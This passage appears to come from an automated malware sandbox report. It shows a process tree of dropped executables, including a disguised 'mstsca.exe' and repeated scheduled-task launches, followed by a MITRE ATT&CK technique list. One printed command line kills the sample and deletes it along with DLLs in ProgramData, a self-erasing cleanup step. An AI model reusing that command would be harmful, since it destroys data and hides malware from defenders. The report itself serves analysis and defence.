PID:1240
- C:\Users\Admin\AppData\Local\Temp\9611.exe
  C:\Users\Admin\AppData\Local\Temp\9611.exe
  2⤵
  PID:8920

C:\Users\Admin\AppData\Local\Temp\9C5B.exe
C:\Users\Admin\AppData\Local\Temp\9C5B.exe
1⤵
PID:6592

C:\Users\Admin\AppData\Local\Temp\AD83.exe
C:\Users\Admin\AppData\Local\Temp\AD83.exe
1⤵
PID:5192

C:\Users\Admin\AppData\Local\Temp\B4C7.exe
C:\Users\Admin\AppData\Local\Temp\B4C7.exe
1⤵
PID:9104
- C:\Users\Admin\AppData\Local\Temp\B4C7.exe
  "C:\Users\Admin\AppData\Local\Temp\B4C7.exe"
  2⤵
  PID:8308

C:\Users\Admin\AppData\Local\Temp\C42A.exe
C:\Users\Admin\AppData\Local\Temp\C42A.exe
1⤵
PID:10652

C:\Users\Admin\AppData\Local\Temp\D254.exe
C:\Users\Admin\AppData\Local\Temp\D254.exe
1⤵
PID:9736
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im D254.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D254.exe" & del C:\ProgramData\*.dll & exit
  2⤵
  PID:9880
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im D254.exe /f
    3⤵
    - Kills process with taskkill
    PID:2980
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    3⤵
    - Delays execution with timeout.exe
    PID:1688

C:\Users\Admin\AppData\Local\Temp\1A2.exe
C:\Users\Admin\AppData\Local\Temp\1A2.exe
1⤵
PID:8040

C:\Users\Admin\AppData\Local\7ce92fdf-9ee4-482c-af58-c40d5ed097ce\E8DB.exe
C:\Users\Admin\AppData\Local\7ce92fdf-9ee4-482c-af58-c40d5ed097ce\E8DB.exe --Task
1⤵
PID:10332
- C:\Users\Admin\AppData\Local\7ce92fdf-9ee4-482c-af58-c40d5ed097ce\E8DB.exe
  C:\Users\Admin\AppData\Local\7ce92fdf-9ee4-482c-af58-c40d5ed097ce\E8DB.exe --Task
  2⤵
  PID:11028

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:1524
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:5192

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:1848
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:7160

C:\Users\Admin\AppData\Local\7ce92fdf-9ee4-482c-af58-c40d5ed097ce\E8DB.exe
C:\Users\Admin\AppData\Local\7ce92fdf-9ee4-482c-af58-c40d5ed097ce\E8DB.exe --Task
1⤵
PID:10228
- C:\Users\Admin\AppData\Local\7ce92fdf-9ee4-482c-af58-c40d5ed097ce\E8DB.exe
  C:\Users\Admin\AppData\Local\7ce92fdf-9ee4-482c-af58-c40d5ed097ce\E8DB.exe --Task
  2⤵
  PID:7192

C:\Users\Admin\AppData\Roaming\facjjbr
C:\Users\Admin\AppData\Roaming\facjjbr
1⤵
PID:6400
- C:\Users\Admin\AppData\Roaming\facjjbr
  C:\Users\Admin\AppData\Roaming\facjjbr
  2⤵
  PID:3208

C:\Users\Admin\AppData\Roaming\cfcjjbr
C:\Users\Admin\AppData\Roaming\cfcjjbr
1⤵
PID:6528

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:7088
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:2668

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:10332
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:6756

C:\Users\Admin\AppData\Local\7ce92fdf-9ee4-482c-af58-c40d5ed097ce\E8DB.exe
C:\Users\Admin\AppData\Local\7ce92fdf-9ee4-482c-af58-c40d5ed097ce\E8DB.exe --Task
1⤵
PID:9844

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:4980

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

New Service

T1050

Scheduled Task

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery